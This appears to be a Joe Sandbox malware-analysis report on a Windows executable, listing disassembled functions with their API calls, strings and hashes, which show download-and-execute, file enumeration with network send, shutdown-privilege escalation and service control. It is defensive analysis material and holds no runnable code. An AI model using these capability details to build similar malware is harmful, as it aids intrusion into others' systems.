Yara matches

Similarity

API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
String ID:
API String ID: 4043647387-0
Opcode ID: 4bc692a3065ec4dc94d58a9f66552e8b6c4911a8063feedc02fb1d9d8faa1e49
Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
Opcode Fuzzy Hash: 4bc692a3065ec4dc94d58a9f66552e8b6c4911a8063feedc02fb1d9d8faa1e49
Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98

Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: eca4c5e4c9c3252e7623ad309c852a815380992cce293f6962d8b63f4c11d957
Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
Opcode Fuzzy Hash: eca4c5e4c9c3252e7623ad309c852a815380992cce293f6962d8b63f4c11d957
Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9

Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02

ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
GetProcAddress.KERNEL32(00000000), ref: 00415977

Strings

SetSuspendState, xrefs: 00415966
PowrProf.dll, xrefs: 0041596B

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: b100f4083b4ee206c4869805bfb9fb2ff182402a1fe4643220b9baa7fd438ee6
Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
Opcode Fuzzy Hash: b100f4083b4ee206c4869805bfb9fb2ff182402a1fe4643220b9baa7fd438ee6
Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E

Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA

Strings

OCP, xrefs: 00451237
ACP, xrefs: 00451201

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799

Function 024C144A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024C1769,?,00000000), ref: 024C14E3
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024C1769,?,00000000), ref: 024C150C
GetACP.KERNEL32(?,?,024C1769,?,00000000), ref: 024C1521

Strings

ACP, xrefs: 024C1468
OCP, xrefs: 024C149E

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
Instruction ID: a260a98f4a6f521b7f8a4731d350f23212716628f27d4665e7ec6e4eb91910b2
Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
Instruction Fuzzy Hash: 3621A42A600101AAD774CF5DC900BB773AAEB44A65F76856EE90EDB312F732D941C394

Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A

Strings

SETTINGS, xrefs: 0041A643

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59

Function 0247900E Relevance: 7.7, APIs: 5, Instructions: 216fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02479013
FindFirstFileW.KERNEL32(00000000,?), ref: 0247908B
FindNextFileW.KERNEL32(00000000,?), ref: 024790B4
FindClose.KERNEL32(?), ref: 024790CB

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: cae9dc3e290e62eb3ac1bcabecde37f344aa65a3c2dada11a4f4a429893bb3a7
Instruction ID: 2a0dc7736368750f98bbd8c06749374e93b52b7d7e93452e9fbe741105c01316
Opcode Fuzzy Hash: cae9dc3e290e62eb3ac1bcabecde37f344aa65a3c2dada11a4f4a429893bb3a7
Instruction Fuzzy Hash: F0811C329001199BCF15EBA5DC94AEE777AEF14310F10426FE926A7190EF70AB49CF90

Function 024C161E Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B7126: GetLastError.KERNEL32(?,024AE4C7,024A9583,024AE4C7,00475B70,?,024ABBBC,FF8BC35D,00475B70,00473EE8), ref: 024B712A
Part of subcall function 024B7126: _free.LIBCMT ref: 024B715D
Part of subcall function 024B7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B719E
Part of subcall function 024B7126: _abort.LIBCMT ref: 024B71A4

Part of subcall function 024B7126: _free.LIBCMT ref: 024B7185
Part of subcall function 024B7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B7192

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024C172A
IsValidCodePage.KERNEL32(00000000), ref: 024C1785
IsValidLocale.KERNEL32(?,00000001), ref: 024C1794
GetLocaleInfoW.KERNEL32(?,00001001,024B3F53,00000040,?,024B4073,00000055,00000000,?,?,00000055,00000000), ref: 024C17DC
GetLocaleInfoW.KERNEL32(?,00001002,024B3FD3,00000040), ref: 024C17FB

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
Instruction ID: ee21247cce392e7e5b2ee2cc0a02aeb746ffe80603af0546c6f60c06fa27699e
Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
Instruction Fuzzy Hash: FB51B17AA016059BDB50DFA9CC44ABB77B9AF04705F24007FE90DEB251EB70D540CB61

Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407A91
FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: bd60294b7bd0b0d96ed98993063c67d27a61c96a06d874a2d4df31aba02818eb
Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
Opcode Fuzzy Hash: bd60294b7bd0b0d96ed98993063c67d27a61c96a06d874a2d4df31aba02818eb
Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99

Function 02477CF3 Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02477CF8
FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02477DB1
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02477DD5
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02477EDD

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
Instruction ID: b4a70502603c0db148fc82f973ae8a8ef3c122a169356592528d1cb1ee80cf3e
Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
Instruction Fuzzy Hash: B75160729002089ACF04FBA5DD95AEDB77AAF10340F90016FE826A7190EF749B49CF91

Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
_free.LIBCMT ref: 00448067

Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED

_free.LIBCMT ref: 00448233

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58

Function 02486D1E Relevance: 7.5, APIs: 5, Instructions: 32COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 02486D2B
OpenProcessToken.ADVAPI32(00000000), ref: 02486D32
LookupPrivilegeValueA.ADVAPI32(00000000,0046BA18,?), ref: 02486D44
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02486D63
GetLastError.KERNEL32 ref: 02486D69

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3534403312-0
Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5

Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318

Strings

open, xrefs: 0040622E
C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 0040627F, 004063A7

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Users\user\Desktop\2iH7rqx9rQ.exe$open
API String ID: 2825088817-2768401417
Opcode ID: c4f0e9230c2a072d1bc5da76ff71190b599de56dce99e95543978978b93002a6
Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
Opcode Fuzzy Hash: c4f0e9230c2a072d1bc5da76ff71190b599de56dce99e95543978978b93002a6
Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B

Function 0247E7B6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0248271E: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0248273E
Part of subcall function 0248271E: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0248275C
Part of subcall function 0248271E: RegCloseKey.ADVAPI32(00000000), ref: 02482767

Sleep.KERNEL32(00000BB8), ref: 0247E86A
ExitProcess.KERNEL32 ref: 0247E8D9

Strings

BG, xrefs: 0247E7C7
pth_unenc, xrefs: 0247E7CC, 0247E813, 0247E880

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: pth_unenc$BG
API String ID: 2281282204-2233081382
Opcode ID: 893b02ec2893ac076e1b48ec4804a82b241512304dbf54cdddd5c3cf734e141d
Instruction ID: f7018b367ddefe5b1801f185c0ff41cdff6dba3b85c7ceb01d43344ddd8af609
Opcode Fuzzy Hash: 893b02ec2893ac076e1b48ec4804a82b241512304dbf54cdddd5c3cf734e141d
Instruction Fuzzy Hash: 94210831B1038067D604B67B8819AAF359BAB81701F50412FEC25673C9FEA68A008FB7

Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

Strings

x@G, xrefs: 00406BC0
x@G, xrefs: 00406AFD

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: x@G$x@G
API String ID: 4113138495-3390264752
Opcode ID: a8a34787590cd02f9299b2d4cfc479429bd311eb328f7f0beb58d9e012be1715
Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
Opcode Fuzzy Hash: a8a34787590cd02f9299b2d4cfc479429bd311eb328f7f0beb58d9e012be1715
Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B

Function 02476D29 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 02476D44
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 02476E0C

Part of subcall function 024746CF: send.WS2_32(?,00000000,00000000,00000000), ref: 02474764

Strings

x@G, xrefs: 02476D64
x@G, xrefs: 02476E27

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: x@G$x@G
API String ID: 4113138495-3390264752
Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
Instruction ID: 8c3d4f0f0113194f010e58d98ede4d9425bfea121aae70d8605616ba42f974d1
Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
Instruction Fuzzy Hash: 22216D311042419BC615FB62DC94DEF77AEEF80354F40092EEAA656190EF74AA09CE62

Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C

Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714

Strings

WallpaperStyle, xrefs: 0041BBB7, 0041BBEA, 0041BC3A
TileWallpaper, xrefs: 0041BC56
Control Panel\Desktop, xrefs: 0041BBB2, 0041BBE5, 0041BC35

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 73115d8dbf50982c30b95305ad368485e5c491fdce54157854103ecb7fa63864
Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
Opcode Fuzzy Hash: 73115d8dbf50982c30b95305ad368485e5c491fdce54157854103ecb7fa63864
Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF

Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
_wcschr.LIBVCRUNTIME ref: 00450BF1
_wcschr.LIBVCRUNTIME ref: 00450BFF
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768

Function 024C0CE6 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B7126: GetLastError.KERNEL32(?,024AE4C7,024A9583,024AE4C7,00475B70,?,024ABBBC,FF8BC35D,00475B70,00473EE8), ref: 024B712A
Part of subcall function 024B7126: _free.LIBCMT ref: 024B715D
Part of subcall function 024B7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B719E
Part of subcall function 024B7126: _abort.LIBCMT ref: 024B71A4

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024B3F5A,?,?,?,?,024B39B1,?,00000004), ref: 024C0DC8
_wcschr.LIBVCRUNTIME ref: 024C0E58
_wcschr.LIBVCRUNTIME ref: 024C0E66
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024B3F5A,00000000,024B407A), ref: 024C0F09

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 2f1efdd49f250f153a7c8dca19099ac794f5d0f52f96597e3c8d2ebbc38e997e
Instruction ID: c3be552de9503f54598a85fbd519fa10819c2cbad4b66b366eb330e35087c3c4
Opcode Fuzzy Hash: 2f1efdd49f250f153a7c8dca19099ac794f5d0f52f96597e3c8d2ebbc38e997e
Instruction Fuzzy Hash: F0611B79640305EAD765AB7DCC41BBB73A9EF44710F24156FE909DB280EB74E940CB60

Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408DAC
FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: FileFind$FirstH_prologNext
String ID:
API String ID: 301083792-0
Opcode ID: c87b7f836c0975e4eb5e884f55165a51c14a00d43e4e68f0cc0c416382850236
Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
